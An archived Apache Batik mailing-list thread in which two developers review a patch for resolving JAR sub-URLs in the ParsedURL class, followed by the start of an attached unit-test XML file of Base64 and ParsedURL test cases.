In order to run regard (our test tool) you will need to do one of two things. 1) comment out the line: <testSuite href="file:test-resources/org/apache/batik/test/beSuite.xml"> In 'xml-batik/test-resources/org/apache/batik/test/regard.xml'. 2) Get a copy of the SVG Working Groups BE test suite. and unpack it in the same directory as xml-batik (so beSuite is a sibling of xml-batik). Then to run the ParsedURL tests simply use: % build.sh regard ParsedURL </testSuite></path></path></URL></URL></keven></pre> </blockquote> I'll let you know when I have the tests up and working.<br> <blockquote type="cite" cite="[email protected]"> <pre><keven @mitre.org=""><URL for="" jar="" file=""><URL for="" kr=""><path in="" jar="" file=""><path in="" jar="" file=""><testSuite href="file:test-resources/org/apache/batik/test/beSuite.xml"> --- Comments on the code: I'm a little disappointed with the use of java.net.URL here (as opposed to directly handling the absolute and relative cases), although I've most convinced myself that this doesn't introduce a significant compatability issue (given the data protocol URL requiremenst of SVG, java.net.URL makes me twichy :).</testSuite></path></path></URL></URL></keven></pre> </blockquote> I fully understand [ yes, I did read the javadoc comments regarding ParsedURL, and why it exists ]. &nbsp;However, I was in a bit of a dilema - I could parse it myself, and construct a suitable URI, but since the JAR URL specification is really Sun's specification, I would rather 'trust' their implementation of constructing a new JAR URL [irrespective of the type of URL being constructed, whether it is absolute, absolute in the same JAR, or relative in the same JAR] than attempting to write a [possibly poor] substitute, and at the same time, not have to worry about possible format specification changes by Sun.<br> <br> Because ParsedURL performs the same type of functionality as the java URL class, if ParsedURL was modified to support these three classes of modifications to an existing ParsedURL, then, I agree, it would be the cleanest approach. &nbsp;However, because other protocols require ParsedURL to operate correctly, I was hesitant to make the necessary modifications, somewhat due to the unwillingness (at the time) to fully understand what ParsedURL was doing in the plethora of cases.<br> <blockquote type="cite" cite="[email protected]"> <pre><keven @mitre.org=""><URL for="" jar="" file=""><URL for="" kr=""><path in="" jar="" file=""><path in="" jar="" file=""><testSuite href="file:test-resources/org/apache/batik/test/beSuite.xml"> As you seem to suspect I might, I really don't like the openStream call. Do you have a case that you expect to encounter here? If not I would rather drop it. </testSuite></path></path></URL></URL></keven></pre> </blockquote> The case that I wanted to support, which, in the long run, isn't very important, is the ability to fall back to the original URL merging algorithm. &nbsp;Assuming that the overall issue is resolved, then the opening and closing of the resource is certainly superflous.<br> <blockquote type="cite" cite="[email protected]"> <pre><keven @mitre.org=""><URL for="" jar="" file=""><URL for="" kr=""><path in="" jar="" file=""><path in="" jar="" file=""><testSuite href="file:test-resources/org/apache/batik/test/beSuite.xml"> Finally, you are better off using 'constructParsedURLData(url)' rather than calling 'parseURL(url.toExternalForm())'.</testSuite></path></path></URL></URL></keven></pre> </blockquote> Great! &nbsp;If there is a preferred/more efficient way of constructing a ParsedURL instance given a URL, then, by all means, make changes.<br> <br> <br> My purpose for posting the original message, and the submitted change, was simply to identify an issue, and to provide a possible solution. &nbsp;The solution is based on my knowledge and understand of Batik, as well as the time available to investigate the matter. &nbsp;I welcome the inclusion, or modification of the solution, more to further extend the capabilities of the entire system.<br> <br> Hope this helps!<br> <blockquote type="cite" cite="[email protected]"> <pre><keven @mitre.org=""><URL for="" jar="" file=""><URL for="" kr=""><path in="" jar="" file=""><path in="" jar="" file=""><testSuite href="file:test-resources/org/apache/batik/test/beSuite.xml"> + // It's relative so base it off baseURL + try { + java.net.URL context = new java.net.URL(baseURL.toString()); + java.net.URL url = new java.net.URL(context, urlStr); + // The following two lines simply verify that the URL is valid. + // Strictly speaking, they are not required, although it allows + // us to have a fallback position. + java.io.InputStream is = url.openStream(); + is.close(); + pd = parseURL(url.toExternalForm()); + } + catch (Exception e) { + pd = super.parseURL(baseURL, urlStr); + } </testSuite></path></path></URL></URL></keven></pre> <br> <pre class="moz-signature" cols="$mailwrapcol">-- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort </pre> </blockquote> <br> <br> <pre class="moz-signature" cols="$mailwrapcol">-- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort </pre> <br> </body> </html> --------------030506080304060603010209-- From [email protected] Mon Feb 03 20:39:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86779 invoked by uid 500); 3 Feb 2003 20:39:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86720 invoked from network); 3 Feb 2003 20:39:20 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Mon, 3 Feb 2003 15:39:21 -0500 To: [email protected] Subject: Re: [Fwd: RE: Problem with Batik source code] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "KR" == Keven Ring <[email protected]> writes: >> Could you please provide additional tests for absolute JAR sub >> URL's? This will help ensure that you have covered all cases and >> that we don't break anything you are depending on in the future. KR> Sure. How would you like me to supply additional tests? Via this KR> reflector? Yes, that would be great. KR> I'll let you know when I have the tests up and working. Thanks. >> Comments on the code: >> >> I'm a little disappointed with the use of java.net.URL here (as >> opposed to directly handling the absolute and relative cases), >> although I've most convinced myself that this doesn't introduce a >> significant compatability issue (given the data protocol URL >> requiremenst of SVG, java.net.URL makes me twichy :). KR> I fully understand [ yes, I did read the javadoc comments KR> regarding ParsedURL, and why it exists ]. However, I was in a bit KR> of a dilema - I could parse it myself, and construct a suitable KR> URI, but since the JAR URL specification is really Sun's KR> specification, I would rather 'trust' their implementation of KR> constructing a new JAR URL [irrespective of the type of URL being KR> constructed, whether it is absolute, absolute in the same JAR, or KR> relative in the same JAR] than attempting to write a [possibly KR> poor] substitute, and at the same time, not have to worry about KR> possible format specification changes by Sun. KR> Because ParsedURL performs the same type of functionality as the KR> java URL class, if ParsedURL was modified to support these three KR> classes of modifications to an existing ParsedURL, then, I agree, KR> it would be the cleanest approach. However, because other KR> protocols require ParsedURL to operate correctly, I was hesitant KR> to make the necessary modifications, somewhat due to the KR> unwillingness (at the time) to fully understand what ParsedURL was KR> doing in the plethora of cases. As I said I don't think it's a huge problem (I don't think a 'jar:data:xxxx!foo.svg' is something that we really need to deal with at this point). >> As you seem to suspect I might, I really don't like the openStream >> call. Do you have a case that you expect to encounter here? If not >> I would rather drop it. KR> The case that I wanted to support, which, in the long run, isn't KR> very important, is the ability to fall back to the original URL KR> merging algorithm. Assuming that the overall issue is resolved, KR> then the opening and closing of the resource is certainly KR> superflous. I guess I was asking if you had a specific type of input that you thought the original code handled and the new code wouldn't. I ran the regard tests with your update any except for improved results from one of the relative cases ("jar:file:dir/file.jar!/p/a/t/h/../base.svg" -> "jar:file:dir/file.jar!/p/a/t/base.svg" - which means that relative references will work now :) everything gave the same results. So the patch is looking pretty good without this check. >> Finally, you are better off using 'constructParsedURLData(url)' >> rather than calling 'parseURL(url.toExternalForm())'. KR> Great! If there is a preferred/more efficient way of constructing KR> a ParsedURL instance given a URL, then, by all means, make KR> changes. I made this change. KR> My purpose for posting the original message, and the submitted KR> change, was simply to identify an issue, and to provide a possible KR> solution. The solution is based on my knowledge and understand of KR> Batik, as well as the time available to investigate the matter. I KR> welcome the inclusion, or modification of the solution, more to KR> further extend the capabilities of the entire system. Sure I understand, of course part of my job is to get the people who "feel the itch" to finish the job (a few tests please ;) so everyone can use it. Thanks for the help! --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Feb 03 20:55:25 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27925 invoked by uid 500); 3 Feb 2003 20:55:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27914 invoked from network); 3 Feb 2003 20:55:24 -0000 Message-ID: <[email protected]> Date: Mon, 03 Feb 2003 15:55:18 -0500 From: Keven Ring <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: [Fwd: RE: Problem with Batik source code] References: <[email protected]> <[email protected]> <[email protected]> Content-Type: multipart/alternative; boundary="------------010000040204000408040404" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --------------010000040204000408040404 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Thomas E Deweese wrote: >>>>>>"KR" == Keven Ring <[email protected]> writes: >>>>>> >>>>>> > > > >>> Could you please provide additional tests for absolute JAR sub >>>URL's? This will help ensure that you have covered all cases and >>>that we don't break anything you are depending on in the future. >>> >>> > >KR> Sure. How would you like me to supply additional tests? Via this >KR> reflector? > > Yes, that would be great. > >KR> I'll let you know when I have the tests up and working. > > Thanks. > > > >>>Comments on the code: >>> >>>I'm a little disappointed with the use of java.net.URL here (as >>>opposed to directly handling the absolute and relative cases), >>>although I've most convinced myself that this doesn't introduce a >>>significant compatability issue (given the data protocol URL >>>requiremenst of SVG, java.net.URL makes me twichy :). >>> >>> > >KR> I fully understand [ yes, I did read the javadoc comments >KR> regarding ParsedURL, and why it exists ]. However, I was in a bit >KR> of a dilema - I could parse it myself, and construct a suitable >KR> URI, but since the JAR URL specification is really Sun's >KR> specification, I would rather 'trust' their implementation of >KR> constructing a new JAR URL [irrespective of the type of URL being >KR> constructed, whether it is absolute, absolute in the same JAR, or >KR> relative in the same JAR] than attempting to write a [possibly >KR> poor] substitute, and at the same time, not have to worry about >KR> possible format specification changes by Sun. > >KR> Because ParsedURL performs the same type of functionality as the >KR> java URL class, if ParsedURL was modified to support these three >KR> classes of modifications to an existing ParsedURL, then, I agree, >KR> it would be the cleanest approach. However, because other >KR> protocols require ParsedURL to operate correctly, I was hesitant >KR> to make the necessary modifications, somewhat due to the >KR> unwillingness (at the time) to fully understand what ParsedURL was >KR> doing in the plethora of cases. > > As I said I don't think it's a huge problem (I don't think a >'jar:data:xxxx!foo.svg' is something that we really need to deal with >at this point). > > To be honest, I'm not sure I even know what this is... :) > > >>>As you seem to suspect I might, I really don't like the openStream >>>call. Do you have a case that you expect to encounter here? If not >>>I would rather drop it. >>> >>> > >KR> The case that I wanted to support, which, in the long run, isn't >KR> very important, is the ability to fall back to the original URL >KR> merging algorithm. Assuming that the overall issue is resolved, >KR> then the opening and closing of the resource is certainly >KR> superflous. > > I guess I was asking if you had a specific type of input that you >thought the original code handled and the new code wouldn't. > > Nope. Simply a CYA check. > I ran the regard tests with your update any except for improved >results from one of the relative cases >("jar:file:dir/file.jar!/p/a/t/h/../base.svg" -> >"jar:file:dir/file.jar!/p/a/t/base.svg" - which means that relative >references will work now :) everything gave the same results. So the >patch is looking pretty good without this check. > Great! I'll add the absolute path checks, and run a 'before and after' change modification, and post the additional tests, and the before and after to the reflector. > > > >>> Finally, you are better off using 'constructParsedURLData(url)' >>>rather than calling 'parseURL(url.toExternalForm())'. >>> >>> > >KR> Great! If there is a preferred/more efficient way of constructing >KR> a ParsedURL instance given a URL, then, by all means, make >KR> changes. > > I made this change. > >KR> My purpose for posting the original message, and the submitted >KR> change, was simply to identify an issue, and to provide a possible >KR> solution. The solution is based on my knowledge and understand of >KR> Batik, as well as the time available to investigate the matter. I >KR> welcome the inclusion, or modification of the solution, more to >KR> further extend the capabilities of the entire system. > > Sure I understand, of course part of my job is to get the people >who "feel the itch" to finish the job (a few tests please ;) so everyone >can use it. > > Thanks for the help! > >--------------------------------------------------------------------- >To unsubscribe, e-mail: [email protected] >For additional commands, e-mail: [email protected] > > > -- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort --------------010000040204000408040404 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body> Thomas E Deweese wrote:<br> <blockquote type="cite" cite="[email protected]"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <pre wrap="">"KR" == Keven Ring <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a> writes: </pre> </blockquote> </blockquote> </blockquote> </blockquote> </blockquote> <pre wrap=""><!----> </pre> <blockquote type="cite"> <blockquote type="cite"> <pre wrap=""> Could you please provide additional tests for absolute JAR sub URL's? This will help ensure that you have covered all cases and that we don't break anything you are depending on in the future. </pre> </blockquote> </blockquote> <pre wrap=""><!----> KR&gt; Sure. How would you like me to supply additional tests? Via this KR&gt; reflector? Yes, that would be great. KR&gt; I'll let you know when I have the tests up and working. Thanks. </pre> <blockquote type="cite"> <blockquote type="cite"> <pre wrap="">Comments on the code: I'm a little disappointed with the use of java.net.URL here (as opposed to directly handling the absolute and relative cases), although I've most convinced myself that this doesn't introduce a significant compatability issue (given the data protocol URL requiremenst of SVG, java.net.URL makes me twichy :). </pre> </blockquote> </blockquote> <pre wrap=""><!----> KR&gt; I fully understand [ yes, I did read the javadoc comments KR&gt; regarding ParsedURL, and why it exists ]. However, I was in a bit KR&gt; of a dilema - I could parse it myself, and construct a suitable KR&gt; URI, but since the JAR URL specification is really Sun's KR&gt; specification, I would rather 'trust' their implementation of KR&gt; constructing a new JAR URL [irrespective of the type of URL being KR&gt; constructed, whether it is absolute, absolute in the same JAR, or KR&gt; relative in the same JAR] than attempting to write a [possibly KR&gt; poor] substitute, and at the same time, not have to worry about KR&gt; possible format specification changes by Sun. KR&gt; Because ParsedURL performs the same type of functionality as the KR&gt; java URL class, if ParsedURL was modified to support these three KR&gt; classes of modifications to an existing ParsedURL, then, I agree, KR&gt; it would be the cleanest approach. However, because other KR&gt; protocols require ParsedURL to operate correctly, I was hesitant KR&gt; to make the necessary modifications, somewhat due to the KR&gt; unwillingness (at the time) to fully understand what ParsedURL was KR&gt; doing in the plethora of cases. As I said I don't think it's a huge problem (I don't think a 'jar:<a class="moz-txt-link-freetext" href="data:xxxx!foo.svg">data:xxxx!foo.svg</a>' is something that we really need to deal with at this point). </pre> </blockquote> To be honest, I'm not sure I even know what this is... :)<br> <blockquote type="cite" cite="[email protected]"> <pre wrap=""> </pre> <blockquote type="cite"> <blockquote type="cite"> <pre wrap="">As you seem to suspect I might, I really don't like the openStream call. Do you have a case that you expect to encounter here? If not I would rather drop it. </pre> </blockquote> </blockquote> <pre wrap=""><!----> KR&gt; The case that I wanted to support, which, in the long run, isn't KR&gt; very important, is the ability to fall back to the original URL KR&gt; merging algorithm. Assuming that the overall issue is resolved, KR&gt; then the opening and closing of the resource is certainly KR&gt; superflous. I guess I was asking if you had a specific type of input that you thought the original code handled and the new code wouldn't. </pre> </blockquote> Nope. &nbsp;Simply a CYA check.<br> <blockquote type="cite" cite="[email protected]"> <pre wrap=""> I ran the regard tests with your update any except for improved results from one of the relative cases (<a class="moz-txt-link-rfc2396E" href="jar:file:dir/file.jar!/p/a/t/h/../base.svg">"jar:file:dir/file.jar!/p/a/t/h/../base.svg"</a> -&gt; <a class="moz-txt-link-rfc2396E" href="jar:file:dir/file.jar!/p/a/t/base.svg">"jar:file:dir/file.jar!/p/a/t/base.svg"</a> - which means that relative references will work now :) everything gave the same results. So the patch is looking pretty good without this check.</pre> </blockquote> <br> Great! &nbsp;I'll add the absolute path checks, and run a 'before and after' change modification, and post the additional tests, and the before and after to the reflector.<br> <blockquote type="cite" cite="[email protected]"> <pre wrap=""> </pre> <blockquote type="cite"> <blockquote type="cite"> <pre wrap=""> Finally, you are better off using 'constructParsedURLData(url)' rather than calling 'parseURL(url.toExternalForm())'. </pre> </blockquote> </blockquote> <pre wrap=""><!----> KR&gt; Great! If there is a preferred/more efficient way of constructing KR&gt; a ParsedURL instance given a URL, then, by all means, make KR&gt; changes. I made this change. KR&gt; My purpose for posting the original message, and the submitted KR&gt; change, was simply to identify an issue, and to provide a possible KR&gt; solution. The solution is based on my knowledge and understand of KR&gt; Batik, as well as the time available to investigate the matter. I KR&gt; welcome the inclusion, or modification of the solution, more to KR&gt; further extend the capabilities of the entire system. Sure I understand, of course part of my job is to get the people who "feel the itch" to finish the job (a few tests please ;) so everyone can use it. Thanks for the help! --------------------------------------------------------------------- To unsubscribe, e-mail: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> For additional commands, e-mail: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> </pre> </blockquote> <br> <br> <pre class="moz-signature" cols="$mailwrapcol">-- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort </pre> <br> </body> </html> --------------010000040204000408040404-- From [email protected] Mon Feb 03 22:54:45 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3009 invoked by uid 500); 3 Feb 2003 22:54:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2958 invoked from network); 3 Feb 2003 22:54:44 -0000 Message-ID: <[email protected]> Date: Mon, 03 Feb 2003 17:54:43 -0500 From: Keven Ring <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: [Fwd: RE: Problem with Batik source code] References: <[email protected]> <[email protected]> <[email protected]> Content-Type: multipart/mixed; boundary="------------000503000803020103020507" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --------------000503000803020103020507 Content-Type: multipart/alternative; boundary="------------080702060108030707080200" --------------080702060108030707080200 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Thomas E Deweese wrote: >>>>>>"KR" == Keven Ring <[email protected]> writes: >>>>>> >>>>>> > > > >>> Could you please provide additional tests for absolute JAR sub >>>URL's? This will help ensure that you have covered all cases and >>>that we don't break anything you are depending on in the future. >>> >>> > >KR> Sure. How would you like me to supply additional tests? Via this >KR> reflector? > > Yes, that would be great. > >KR> I'll let you know when I have the tests up and working. > > Thanks. > > > Attached are the ParsedURL tests which I added, along with the html results from the original code. Also, I have attached the changes to the code which you have suggested. If there is anything else, please let me know! -- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort --------------080702060108030707080200 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body> Thomas E Deweese wrote:<br> <blockquote type="cite" cite="[email protected]"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <pre wrap="">"KR" == Keven Ring <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a> writes: </pre> </blockquote> </blockquote> </blockquote> </blockquote> </blockquote> <pre wrap=""><!----> </pre> <blockquote type="cite"> <blockquote type="cite"> <pre wrap=""> Could you please provide additional tests for absolute JAR sub URL's? This will help ensure that you have covered all cases and that we don't break anything you are depending on in the future. </pre> </blockquote> </blockquote> <pre wrap=""><!----> KR&gt; Sure. How would you like me to supply additional tests? Via this KR&gt; reflector? Yes, that would be great. KR&gt; I'll let you know when I have the tests up and working. Thanks. </pre> </blockquote> Attached are the ParsedURL tests which I added, along with the html results from the original code. &nbsp;Also, I have attached the changes to the code which you have suggested.<br> <br> If there is anything else, please let me know!<br> <br> <pre class="moz-signature" cols="$mailwrapcol">-- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort </pre> <br> </body> </html> --------------080702060108030707080200-- --------------000503000803020103020507 Content-Type: text/xml; name="unitTesting.xml" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="unitTesting.xml" <!-- ====================================================================== --> <!-- Copyright (C) The Apache Software Foundation. All rights reserved. --> <!-- --> <!-- This software is published under the terms of the Apache Software --> <!-- License version 1.1, a copy of which has been included with this --> <!-- distribution in the LICENSE file. --> <!-- ====================================================================== --> <!-- ====================================================================== --> <!-- @author [email protected] --> <!-- @author [email protected] --> <!-- @version $Id: unitTesting.xml,v 1.5 2002/07/11 16:26:20 deweese Exp $ --> <!-- ====================================================================== --> <testSuite id="util.unitTesting" name="org.apache.batik.util Unit Testing"> <!-- ====================================================================== --> <!-- Security Tests --> <!-- ====================================================================== --> <test id="securityEnforcerTest" class="org.apache.batik.util.ApplicationSecurityEnforcerTest" /> <!-- ====================================================================== --> <!-- Base64 Tests --> <!-- ====================================================================== --> <test id="B64.1" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/zeroByte" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/zeroByte.64" /> </test> <test id="B64.2" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/zeroByte.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/zeroByte" /> </test> <test id="B64.3" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/zeroByte" /> </test> <test id="B64.4" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/oneByte" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/oneByte.64" /> </test> <test id="B64.5" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/oneByte.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/oneByte" /> </test> <test id="B64.6" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/oneByte" /> </test> <test id="B64.7" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/twoByte" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/twoByte.64" /> </test> <test id="B64.8" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/twoByte.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/twoByte" /> </test> <test id="B64.9" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/twoByte" /> </test> <test id="B64.10" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/threeByte" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/threeByte.64" /> </test> <test id="B64.11" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/threeByte.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/threeByte" /> </test> <test id="B64.12" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/threeByte" /> </test> <test id="B64.13" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/fourByte" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/fourByte.64" /> </test> <test id="B64.14" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/fourByte.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/fourByte" /> </test> <test id="B64.15" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/fourByte" /> </test> <test id="B64.16" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/tenByte" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/tenByte.64" /> </test> <test id="B64.17" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/tenByte.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/tenByte" /> </test> <test id="B64.18" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/tenByte" /> </test> <test id="B64.19" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/small" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/small.64" /> </test> <test id="B64.20" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/small.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/small" /> </test> <test id="B64.21" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/small" /> </test> <test id="B64.22" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="ENCODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/medium" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/medium.64" /> </test> <test id="B64.23" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/medium.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/medium" /> </test> <test id="B64.24" class="org.apache.batik.util.Base64Test"> <arg class="java.lang.String" value="DECODE" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/medium.pc.64" /> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/medium" /> </test> <test id="B64.25" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/medium" /> </test> <test id="B64.26" class="org.apache.batik.util.Base64Test"> <arg class="java.net.URL" value="file:test-references/org/apache/batik/util/large" /> </test> <!-- ====================================================================== --> <!-- ParsedURL Tests --> <!-- ====================================================================== --> <test id="ParsedURL.1" class="org.apache.batik.util.ParsedURLTest"> <!-- Test simple parsing --> <arg class="java.lang.String" value="xml.apache.org" /> <arg class="java.lang.String" value="//xml.apache.org" /> </test> <test id="ParsedURL.2" class="org.apache.batik.util.ParsedURLTest"> <!-- Test simple parsing --> <arg class="java.lang.String" value="fooz:/home/deweese/.cshrc" /> <arg class="java.lang.String" value="fooz:/home/deweese/.cshrc" /> </test> <test id="ParsedURL.3" class="org.apache.batik.util.ParsedURLTest"> <!-- Test simple parsing --> <arg class="java.lang.String" value="fazz:///home/deweese/.cshrc" /> <arg class="java.lang.String" value="fazz:/home/deweese/.cshrc" /> </test> <test id="ParsedURL.3" class="org.apache.batik.util.ParsedURLTest"> <!-- Test simple parsing of single URL --> <arg class="java.lang.String" value="fooz://www.com:1234/home/deweese/.cshrc#abcd" /> <arg class="java.lang.String" value="fooz://www.com:1234/home/deweese/.cshrc#abcd" /> </test> <test id="ParsedURL.4" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative url off root --> <arg class="java.lang.String" value="http://xml.apache.org/" /> <arg class="java.lang.String" value="~deweese" /> <arg class="java.lang.String" value="http://xml.apache.org/~deweese" /> </test> <test id="ParsedURL.5" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative url off file in root dir --> <arg class="java.lang.String" value="file:///xml.apache.org" /> <arg class="java.lang.String" value="~deweese" /> <arg class="java.lang.String" value="file:/~deweese" /> </test> <test id="ParsedURL.6" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative with partial path and fragement ident --> <arg class="java.lang.String" value="fooz://www.com:1234/home/deweese/.cshrc#abcd" /> <arg class="java.lang.String" value="xyz.html#efgh" /> <arg class="java.lang.String" value="fooz://www.com:1234/home/deweese/xyz.html#efgh" /> </test> <test id="ParsedURL.7" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative with absolute path and fragement ident --> <arg class="java.lang.String" value="fooz://www.com:1234/home/deweese/xyz.html#efgh" /> <arg class="java.lang.String" value="/xyz.svg#ijkl" /> <arg class="java.lang.String" value="fooz://www.com:1234/xyz.svg#ijkl" /> </test> <test id="ParsedURL.8" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative with matching protocol --> <arg class="java.lang.String" value="file:/home/deweese/test.txt" /> <arg class="java.lang.String" value="file:junk.html" /> <arg class="java.lang.String" value="file:/home/deweese/junk.html" /> </test> <test id="ParsedURL.9" class="org.apache.batik.util.ParsedURLTest"> <!-- Test just keeping protocol --> <arg class="java.lang.String" value="http://xml.apache.org/batik/" /> <arg 